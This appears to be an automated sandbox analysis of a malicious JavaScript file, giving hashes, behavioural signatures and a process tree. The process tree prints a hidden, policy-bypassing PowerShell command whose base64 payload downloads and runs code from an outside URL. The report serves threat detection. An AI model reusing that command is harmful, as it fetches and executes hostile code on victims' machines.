Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/12/2023, 23:14
Static task
static1
Behavioral task
behavioral1
Sample
18a3c92c310878e9c920059d9093b5e9.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
18a3c92c310878e9c920059d9093b5e9.js
Resource
win10v2004-20231215-en
General
-
Target
18a3c92c310878e9c920059d9093b5e9.js
-
Size
63KB
-
MD5
18a3c92c310878e9c920059d9093b5e9
-
SHA1
19132139d6864738109fca076d5d61951fb64d54
-
SHA256
4c95d49a4ccba503ef62813260211d237b95b22ab3b8532998526a1f5fcb441a
-
SHA512
7160932adf198a92521424e426d0f0918b43afc6f050f025e5826455c443ea9baef049ffdfe75911a1706b4bac88155cf6d3a89a38469070d5ea1fe0deef7842
-
SSDEEP
1536:ja1D9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4Z:ja1D9Ry98guHVBqqg2bcruzUHmLKeMMe
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2792 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1992 wrote to memory of 2664 1992 wscript.exe 28 PID 1992 wrote to memory of 2664 1992 wscript.exe 28 PID 1992 wrote to memory of 2664 1992 wscript.exe 28 PID 2664 wrote to memory of 2792 2664 cmd.exe 30 PID 2664 wrote to memory of 2792 2664 cmd.exe 30 PID 2664 wrote to memory of 2792 2664 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\18a3c92c310878e9c920059d9093b5e9.js1⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-